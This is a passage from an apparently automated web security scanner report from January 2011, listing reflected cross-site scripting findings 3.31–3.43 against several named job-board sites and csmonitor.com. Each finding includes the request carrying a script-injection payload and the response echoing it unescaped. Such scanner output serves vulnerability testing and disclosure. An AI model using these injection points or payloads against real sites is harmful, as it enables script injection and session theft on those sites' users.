This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1752d"><script>alert(1)</script>11735ab5ac7=1 HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:27 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ed21alnsfs6f26cfhvjk1jc6s7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120988

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.computeraideddesigncrossing.com/?1752d"><script>alert(1)</script>11735ab5ac7=1">
...[SNIP]...

3.31. http://www.constructioncrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constructioncrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac657"><script>alert(1)</script>1735ed5792f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ac657"><script>alert(1)</script>1735ed5792f=1 HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0glasi0furb49t09sf8usk8131; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 131646

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.constructioncrossing.com/?ac657"><script>alert(1)</script>1735ed5792f=1">
...[SNIP]...

3.32. http://www.consultingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.consultingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd97c"><script>alert(1)</script>8601e5cd1fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fd97c"><script>alert(1)</script>8601e5cd1fd=1 HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=iko9vh37jo3le1bfsfh85lnv64; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.consultingcrossing.com/?fd97c"><script>alert(1)</script>8601e5cd1fd=1">
...[SNIP]...

3.33. http://www.contractmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.contractmanagementcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d62a6"><script>alert(1)</script>6f6a8319c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d62a6"><script>alert(1)</script>6f6a8319c16=1 HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=10pkrahhva0p5pupcvs1ma41n4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111842

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.contractmanagementcrossing.com/?d62a6"><script>alert(1)</script>6f6a8319c16=1">
...[SNIP]...

3.34. http://www.counselingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.counselingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 662a5"><script>alert(1)</script>9af98f88fd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?662a5"><script>alert(1)</script>9af98f88fd9=1 HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f5kspj2g81754pnc3vhgter554; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149376

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.counselingcrossing.com/?662a5"><script>alert(1)</script>9af98f88fd9=1">
...[SNIP]...

3.35. http://www.cpluspluscrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cpluspluscrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84068"><script>alert(1)</script>76cfc652e34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?84068"><script>alert(1)</script>76cfc652e34=1 HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gj2r0hmde0qmmm07o2jddtilj0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114876

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.cpluspluscrossing.com/?84068"><script>alert(1)</script>76cfc652e34=1">
...[SNIP]...

3.36. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fb27"-alert(1)-"1739995f90e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA2fb27"-alert(1)-"1739995f90e/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:11 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:25:11 GMT
Date: Fri, 21 Jan 2011 22:25:11 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA2fb27"-alert(1)-"1739995f90e/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.37. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab91"-alert(1)-"1faa5b06e1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/20101ab91"-alert(1)-"1faa5b06e1f/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:19 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86392
Expires: Sat, 22 Jan 2011 22:25:11 GMT
Date: Fri, 21 Jan 2011 22:25:19 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/20101ab91"-alert(1)-"1faa5b06e1f/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.38. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e99ca"-alert(1)-"45e4a32e5f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/2010/1228e99ca"-alert(1)-"45e4a32e5f7/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:31 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86355
Expires: Sat, 22 Jan 2011 22:24:46 GMT
Date: Fri, 21 Jan 2011 22:25:31 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/2010/1228e99ca"-alert(1)-"45e4a32e5f7/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.39. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37c15"-alert(1)-"4ca3ca944b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal37c15"-alert(1)-"4ca3ca944b5 HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:54 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:25:54 GMT
Date: Fri, 21 Jan 2011 22:25:54 GMT
Content-Length: 22031
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal37c15"-alert(1)-"4ca3ca944b5";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.40. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d082"-alert(1)-"de38b5e98a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA1d082"-alert(1)-"de38b5e98a6/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:14 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86399
Expires: Sat, 22 Jan 2011 22:25:13 GMT
Date: Fri, 21 Jan 2011 22:25:14 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA1d082"-alert(1)-"de38b5e98a6/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.41. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd583"-alert(1)-"06ddd227669 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Politicscd583"-alert(1)-"06ddd227669/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:23 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86374
Expires: Sat, 22 Jan 2011 22:24:57 GMT
Date: Fri, 21 Jan 2011 22:25:23 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politicscd583"-alert(1)-"06ddd227669/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.42. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54f7f"-alert(1)-"984baab725b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Politics/monitor_breakfast54f7f"-alert(1)-"984baab725b/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:37 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:25:38 GMT
Date: Fri, 21 Jan 2011 22:25:38 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast54f7f"-alert(1)-"984baab725b/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.43. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ac7e"-alert(1)-"619fa0f46a4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Politics/monitor_breakfast/20111ac7e"-alert(1)-"619fa0f46a4/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:25:52 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86378
Expires: Sat, 22 Jan 2011 22:25:31 GMT
Date: Fri, 21 Jan 2011 22:25:53 GMT
Content-Length: 22093
Connection: close

